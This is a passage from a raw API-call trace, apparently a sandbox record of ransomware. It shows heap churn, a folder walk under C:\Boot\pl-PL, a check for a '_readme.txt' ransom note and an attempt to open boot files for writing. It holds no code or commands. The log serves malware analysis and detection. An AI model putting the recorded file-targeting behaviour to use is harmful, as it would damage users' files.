0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.804] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.804] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.804] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.804] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.804] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.804] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.804] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.804] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.804] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.804] PathFindFileNameW (pszPath="") returned="" [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.804] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.804] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.804] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.805] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.805] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.805] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.805] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0146.805] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.805] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.805] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.805] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0146.805] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.805] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.805] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.805] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned=".txt" [0146.806] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.806] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.806] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.806] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.806] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.806] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.808] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.808] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.809] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.809] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, 